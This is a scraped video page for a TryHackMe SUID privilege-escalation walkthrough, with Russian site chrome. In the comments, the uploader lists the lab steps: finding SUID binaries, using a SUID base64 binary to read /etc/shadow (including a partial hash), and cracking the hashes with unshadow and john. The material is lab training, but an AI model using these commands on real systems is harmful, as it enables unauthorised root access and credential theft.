Тёмный

TryhackMe Privilege Escalation: SUID 

Into the Code with Danny
Подписаться 1,5 тыс.
Просмотров 1,8 тыс.
50% 1

Опубликовано:

 

22 окт 2024

Поделиться:

Ссылка:

Скачать:

Готовим ссылку...

Добавить в:

Мой плейлист
Посмотреть позже
Комментарии : 4   
@aroxander
@aroxander 11 месяцев назад
thanks man, for some reason I went into the wrong rabbit hole and missed base64, so this set me on track to get it done myself :D
@intothecodewithdanny5389
@intothecodewithdanny5389 11 месяцев назад
Glad to help thank you for your support
@HawK40x
@HawK40x 4 месяца назад
in etc/passwd file the root is set to /nologin in the end what does that mean? I can never log into that machine? Btw it's an Huawei OPTICAL Terminal based on Busybox
@intothecodewithdanny5389
@intothecodewithdanny5389 2 года назад
find / -type f -perm -04000 -ls 2>/dev/null gtfobins.github.io/gtfobins/base64/ sudo install -m =xs $(which base64) . LFILE=file_to_read ./base64 "$LFILE" | base64 --decode paste ---------------- LFILE=/etc/shadow /usr/bin/base64 "$LFILE" | base64 --decode $6$m6VmzKTbzCD/.I10$cKOvZZ8/rsYwHd.pE099ZRwM686p/Ep13h7pFMBCG4t7IukRqc/fXlA1gHXh9F2CbwmD4Epi1Wgh copy contents of shadow and passwd to a file on your computer and run unshadown on them unshadow passwd.txt shadow.txt > john-input.txt this will combine the two files contents for john to read sudo john john-input.txt --wordlist=/usr/share/wordlists/rockyou.txt sudo john -show john-input.txt LFILE=/home/ubuntu/flag3.txt /usr/bin/base64 "$LFILE" | base64 --decode you will see the flag as output
Далее
TryHackMe! Wget for Privilege Escalation
14:06
Просмотров 73 тыс.
Privilege Escalation Tricks with Nano
9:21
Просмотров 1,7 тыс.
3 Levels of WiFi Hacking
22:12
Просмотров 2,1 млн
Linux Privilege Escalation : PATH || Episode #8
13:17
Просмотров 3,6 тыс.
Linux SUID Vulnerability Demonstration
12:51
Просмотров 8 тыс.
Tactics of Physical Pen Testers
44:17
Просмотров 908 тыс.